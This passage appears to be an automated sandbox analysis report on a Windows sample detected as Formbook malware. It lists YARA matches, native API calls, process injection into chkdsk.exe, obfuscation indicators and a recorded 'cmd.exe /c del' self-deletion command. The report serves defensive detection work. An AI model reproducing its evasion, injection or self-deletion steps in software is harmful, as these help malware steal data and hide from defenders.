          Source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.GV8EJooYMIgEnEk.exe.28fd388.1.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste, author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.GV8EJooYMIgEnEk.exe.2979c1c.2.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste, author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
          Source: 0.2.GV8EJooYMIgEnEk.exe.3a0a690.3.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.GV8EJooYMIgEnEk.exe.3a0a690.3.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.GV8EJooYMIgEnEk.exe.3a64cb0.4.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.GV8EJooYMIgEnEk.exe.3a64cb0.4.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.343584977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.343584977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.415734723.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.415734723.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.566609837.0000000000140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.566609837.0000000000140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.415434999.0000000001660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.415434999.0000000001660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.389518706.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.389518706.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.372050188.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.372050188.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.343960936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook_1, date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.343960936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Formbook, author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: String function: 04D8B150 appears 35 times
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Code function: 3_2_004185E0 NtCreateFile
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Code function: 3_2_00418690 NtReadFile
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Code function: 3_2_00418710 NtClose
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Code function: 3_2_004187C0 NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Code function: 3_2_004185DA NtCreateFile
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe, Code function: 3_2_0041870C NtClose
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC95D0 NtClose, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC9540 NtReadFile, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC96D0 NtCreateKey, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC96E0 NtFreeVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC9650 NtQueryValueKey, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC9660 NtAllocateVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC9FE0 NtCreateMutant, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC9780 NtMapViewOfSection, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC9710 NtQueryInformationToken, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC9840 NtDelayExecution, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC9860 NtQuerySystemInformation, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC99A0 NtCreateSection, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC9910 NtAdjustPrivilegesToken, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC9A50 NtCreateFile, LdrInitializeThunk
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC95F0 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC9560 NtWriteFile
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DCAD30 NtSetContextThread
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC9520 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC9670 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC9610 NtEnumerateValueKey
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC97A0 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DCA770 NtOpenThread
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC9770 NtSetInformationFile
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC9760 NtOpenProcess
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DCA710 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC9730 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC98F0 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC98A0 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DCB040 NtSuspendThread
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 10_2_04DC9820 NtEnumerateKey
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC99D0 NtCreateProcessEx,10_2_04DC99D0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC9950 NtQueueApcThread,10_2_04DC9950
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC9A80 NtOpenDirectoryObject,10_2_04DC9A80
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC9A10 NtQuerySection,10_2_04DC9A10
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC9A00 NtProtectVirtualMemory,10_2_04DC9A00
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC9A20 NtResumeThread,10_2_04DC9A20
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DCA3B0 NtGetContextThread,10_2_04DCA3B0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DC9B00 NtSetValueKey,10_2_04DC9B00
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04AA85E0 NtCreateFile,10_2_04AA85E0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04AA8690 NtReadFile,10_2_04AA8690
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04AA87C0 NtAllocateVirtualMemory,10_2_04AA87C0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04AA8710 NtClose,10_2_04AA8710
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04AA85DA NtCreateFile,10_2_04AA85DA
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04AA870C NtClose,10_2_04AA870C
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUI.dllF vs GV8EJooYMIgEnEk.exe
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.345190906.00000000005F2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameStructuralEqualityCompar.exe2 vs GV8EJooYMIgEnEk.exe
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.345998808.0000000002965000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSafeSerializationManager.dll: vs GV8EJooYMIgEnEk.exe
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.345759708.00000000028B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSafeSerializationManager.dll: vs GV8EJooYMIgEnEk.exe
          Source: GV8EJooYMIgEnEk.exe, 00000000.00000002.349469695.0000000007000000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameUI.dllF vs GV8EJooYMIgEnEk.exe
          Source: GV8EJooYMIgEnEk.exe, 00000003.00000000.341708297.0000000000DE2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameStructuralEqualityCompar.exe2 vs GV8EJooYMIgEnEk.exe
          Source: GV8EJooYMIgEnEk.exe, 00000003.00000002.416179493.00000000019CF000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs GV8EJooYMIgEnEk.exe
          Source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415711074.0000000001696000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCHKDSK.EXEj% vs GV8EJooYMIgEnEk.exe
          Source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415965180.000000000183F000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs GV8EJooYMIgEnEk.exe
          Source: GV8EJooYMIgEnEk.exeBinary or memory string: OriginalFilenameStructuralEqualityCompar.exe2 vs GV8EJooYMIgEnEk.exe
          Source: GV8EJooYMIgEnEk.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: GV8EJooYMIgEnEk.exeVirustotal: Detection: 60%
          Source: GV8EJooYMIgEnEk.exeMetadefender: Detection: 20%
          Source: GV8EJooYMIgEnEk.exeReversingLabs: Detection: 62%
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeFile read: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe:Zone.Identifier
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe "C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe"
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeProcess created: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\GV8EJooYMIgEnEk.exe.log
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@7/5
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6120:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: GV8EJooYMIgEnEk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: GV8EJooYMIgEnEk.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: GV8EJooYMIgEnEk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: chkdsk.pdbGCTL source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415690585.0000000001690000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: chkdsk.pdb source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415690585.0000000001690000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415809187.0000000001720000.00000040.00000800.00020000.00000000.sdmp, GV8EJooYMIgEnEk.exe, 00000003.00000002.415965180.000000000183F000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: GV8EJooYMIgEnEk.exe, 00000003.00000002.415809187.0000000001720000.00000040.00000800.00020000.00000000.sdmp, GV8EJooYMIgEnEk.exe, 00000003.00000002.415965180.000000000183F000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: StructuralEqualityCompar.pdb source: GV8EJooYMIgEnEk.exe

          Data Obfuscation

          Source: GV8EJooYMIgEnEk.exe, i8/By.cs.Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 0.0.GV8EJooYMIgEnEk.exe.590000.0.unpack, i8/By.cs.Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 0.2.GV8EJooYMIgEnEk.exe.590000.0.unpack, i8/By.cs.Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.GV8EJooYMIgEnEk.exe.d80000.3.unpack, i8/By.cs.Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.GV8EJooYMIgEnEk.exe.d80000.1.unpack, i8/By.cs.Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.2.GV8EJooYMIgEnEk.exe.d80000.1.unpack, i8/By.cs.Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.GV8EJooYMIgEnEk.exe.d80000.2.unpack, i8/By.cs.Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.GV8EJooYMIgEnEk.exe.d80000.5.unpack, i8/By.cs.Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.GV8EJooYMIgEnEk.exe.d80000.0.unpack, i8/By.cs.Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.GV8EJooYMIgEnEk.exe.d80000.9.unpack, i8/By.cs.Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: 3.0.GV8EJooYMIgEnEk.exe.d80000.7.unpack, i8/By.cs.Net Code: x8k System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 0_2_07164FF9 push es; retf 0_2_0716500D
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 0_2_0716C325 push FFFFFF8Bh; iretd 0_2_0716C327
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_0041B822 push eax; ret 3_2_0041B828
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_0041B82B push eax; ret 3_2_0041B892
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_0041B88C push eax; ret 3_2_0041B892
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_00419178 push ebp; iretd 3_2_0041917B
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_0041A10B push edi; retf 3_2_0041A10C
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_0041A2A7 push ebx; retf 3_2_0041A2AA
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_00415C52 pushad ; ret 3_2_00415C5A
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_0041CCCE push es; iretd 3_2_0041CCD0
          Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exeCode function: 3_2_0041B7D5 push eax; ret 3_2_0041B828
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04DDD0D1 push ecx; ret 10_2_04DDD0E4
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 10_2_04AACCCE push es; iretd 10_2_04AACCD0
